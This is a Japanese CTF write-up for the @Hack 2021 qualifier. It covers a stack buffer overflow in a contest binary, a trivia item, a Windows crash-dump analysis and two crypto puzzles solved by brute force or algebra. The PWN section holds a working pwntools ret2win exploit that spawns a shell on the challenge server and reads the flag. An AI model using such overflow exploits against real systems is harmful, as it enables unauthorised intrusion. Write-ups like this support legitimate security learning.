@Hack CTF qualification Writeup

CTF writeup

この大会は2021/11/20 21:00(JST)~2021/11/21 5:00(JST)に開催されました。
今回もチームで参戦。結果は408点で338チーム中44位でした。
自分で解けた問題をWriteupとして書いておきます。

PWN 1 (PWN 100)

mainをGhidraでデコンパイルする。

undefined8 main(void)

{
  setvbuf(stderr,(char *)0x0,2,0);
  setvbuf(stdout,(char *)0x0,2,0);
  vuln();
  return 0;
}

void vuln(void)

{
  char local_12 [10];
  
  fgets(local_12,0xaa,stdin);
  return;
}

void mysterious_function(void)

{
  system("/bin/sh");
  return;
}

BOFでmysterious_function関数をコールする。

$ gdb -q ./main
Reading symbols from ./main...(no debugging symbols found)...done.
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: /mnt/hgfs/Shared/main 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers----------------------------------]
RAX: 0x7fffffffde46 ("AAA%AAsAABAA$AA"...)
RBX: 0x0 
RCX: 0x1f 
RDX: 0x7ffff7dcf8d0 --> 0x0 
RSI: 0x7fffffffde46 ("AAA%AAsAABAA$AA"...)
RDI: 0x7fffffffde47 ("AA%AAsAABAA$AAn"...)
RBP: 0x41416e4141244141 (b'AA$AAnAA')
RSP: 0x7fffffffde58 ("CAA-AA(AADAA;AA"...)
RIP: 0x40066c (<vuln+34>:	ret)
R8 : 0x6022c5 --> 0x0 
R9 : 0x7ffff7fda4c0 (0x00007ffff7fda4c0)
R10: 0x602010 --> 0x0 
R11: 0x246 
R12: 0x400550 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdf40 --> 0x1 
R14: 0x0 
R15: 0x0
[------------------------------------code-------------------------------------]
Display various information of current execution context
Usage:
    context [reg,code,stack,all] [code/stack length]

0x000000000040066c in vuln ()
gdb-peda$ patto CAA-AA(AADAA;AA
CAA-AA(AADAA;AA found at offset: 18

$ ROPgadget --binary ./main | grep ": ret"
0x000000000040050e : ret

from pwn import *

if len(sys.argv) == 1:
    p = remote('1-pwn.athack-ctf.com', 1337)
else:
    p = process('./main')

elf = ELF('./main')

mysterious_function_addr = elf.symbols['mysterious_function']
ret_addr = 0x40050e
offset = 18
print hex(mysterious_function_addr)

payload = 'A' * offset
payload += p64(ret_addr)
payload += p64(mysterious_function_addr)

print payload
p.sendline(payload)
p.interactive()

実行結果は以下の通り。

[+] Opening connection to 1-pwn.athack-ctf.com on port 1337: Done
[*] '/mnt/hgfs/Shared/main'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
0x400637
AAAAAAAAAAAAAAAAAA\x0e@\x00\x00\x00\x06\x00\x00\x00
[*] Switching to interactive mode
$ ls
flag.txt
main
ynetd
$ cat flag.txt
AtHackCTF{9302575208025782507402580}
AtHackCTF{9302575208025782507402580}

X BoF (Trivia 100)

予期されるASCII文字の入力にUnicode文字を挿入したら、プログラムが失敗した。この場合に疑われるBoFの種類を答える。

AtHackCTF{Unicode BoF}

Debug (DFIR 100)

メモリダンプファイルが添付されていて、フラグフォーマットが"Flag Format: AtHackCTF{md5(FAILUREIDHASH_BUGCHECKCODE_FAILUREBUCKETID)}"となっている。
WinDbgで開き、!analyze -vをクリックする。

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 80000003, Exception code that caused the bugcheck
Arg2: 05080cb3, Address of the instruction which caused the bugcheck
Arg3: 0632ed50, Address of the context record for the exception that caused the bugcheck
Arg4: 00000000, zero.

Debugging Details:
------------------

Unable to load image \??\C:\Windows\system32\drivers\myfault.sys, Win32 error 0n2

KEY_VALUES_STRING: 1

    Key  : Analysis.CPU.mSec
    Value: 765

    Key  : Analysis.DebugAnalysisManager
    Value: Create

    Key  : Analysis.Elapsed.mSec
    Value: 1762

    Key  : Analysis.Init.CPU.mSec
    Value: 2749

    Key  : Analysis.Init.Elapsed.mSec
    Value: 35838

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 100

    Key  : WER.OS.Branch
    Value: win7sp1_rtm

    Key  : WER.OS.Timestamp
    Value: 2010-11-19T18:50:00Z

    Key  : WER.OS.Version
    Value: 7.1.7601.17514


VIRTUAL_MACHINE:  VMware

BUGCHECK_CODE:  3b★

BUGCHECK_P1: 80000003

BUGCHECK_P2: fffff88005080cb3

BUGCHECK_P3: fffff8800632ed50

BUGCHECK_P4: 0

CONTEXT:  0632ed50 -- (.cxr 0xfffff8800632ed50)
eax=02ffba30 ebx=fffff880 ecx=fffffa80 edx=02ffba00 esi=0632fb60 edi=fffff880
eip=00000000 esp=00000000 ebp=fffffa80 iopl=0         nv up di pl nz na po nc
cs=0000  ss=0018  ds=f730  es=0000  fs=0000  gs=f880             efl=00000000
00000000`00000000 ??              ???
Resetting default scope

PROCESS_NAME:  notmyfault64.exe

IP_IN_FREE_BLOCK: 0

BAD_STACK_POINTER:  00000000

STACK_TEXT:  
00000000 00000000     00000000 00000000 00000000 0x0


SYMBOL_NAME:  myfault+1cb3

MODULE_NAME: myfault

IMAGE_NAME:  myfault.sys

STACK_COMMAND:  .thread ; .cxr ; kb

FAILURE_BUCKET_ID:  INVALID_KERNEL_CONTEXT_0x3B_80000003★

OS_VERSION:  7.1.7601.17514

BUILDLAB_STR:  win7sp1_rtm

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 7

FAILURE_ID_HASH:  {e531da8c-62d2-198a-1c77-b5a06a202afd}★

Followup:     MachineOwner
---------
$ echo -n "e531da8c-62d2-198a-1c77-b5a06a202afd_3b_INVALID_KERNEL_CONTEXT_0x3B_80000003" | md5sum
db5f4defc49e3a126bbe7d9a7ca548fa  -

AtHackCTF{db5f4defc49e3a126bbe7d9a7ca548fa}

Fun Math (Crypto 100)

1文字ずつ暗号化しているので、ブルートフォースで復号する。

#!/usr/bin/env python3
def my_function(x):
    return pow(x,3)+10*pow(x,2)+x*7 + 6

cipher = [317336, 1696274, 425598, 1007448, 1069008, 1340288, 346128, 663858, 392496, 2013024, 734808, 1233758, 1268616, 1069008, 1233758, 948296, 142008, 1653936, 948296, 516368, 133974, 1612308, 1133024, 948296, 392496, 1739328, 1452776, 948296, 641264, 133974, 497274, 1783104, 1268616, 1452776, 1199544, 948296, 1531158, 133974, 1377114, 1918824, 1452776, 133974, 1414608, 1268616, 1007448, 1377114, 1653936, 948296, 556008, 619188, 948296, 1037924, 619188, 1739328, 1696274, 1133024, 392496, 133974, 1612308, 1069008, 1268616, 1452776, 1199544, 290184, 47064, 2110256]

flag = ''
for c in cipher:
    for code in range(32, 127):
        if my_function(code) == c:
            flag += chr(code)
            break

print(flag)

AtHackCTF{Which_1s_M0re_Fun_S0Lving_p0lyn0mials_OR_bRuteF0rcing?!}

Complex (Crypto)

複素数平方根を求める公式を使って、a, bを算出する。あとはinverseでxを算出し、フラグを構成していく。

#!/usr/bin/env python3
import gmpy2
from Crypto.Util.number import *

c = 6983291701597905
d = 5336385994037448
parts = [380932079629368, 191767163205492, 391844072538906, 242715789325632, 636916609920084, 101350594515744, 701115392013585, 136776893476692, 666218469621657, 205565478406008, 588555394058607, 3755755500]
p = 14088005995134184327

K2 = c ** 2 + d ** 2
K = gmpy2.iroot(K2, 2)[0]
assert K**2 == K2

a2 = (c + K) // 2
a = gmpy2.iroot(a2, 2)[0]
assert a**2 == a2

b2 = (- c + K) // 2
b = gmpy2.iroot(b2, 2)[0]
assert b**2 == b2

flag = b''
for i in range(len(parts)):
    if i % 2 == 0:
        x = (parts[i] * inverse(a, p)) % p
    else:
        x = (parts[i] * inverse(b, p)) % p
    flag += long_to_bytes(x)

flag = flag.decode()
print(flag)

AtHackCTF{C0mpl3xxxx_Ev3ryWheRe!!}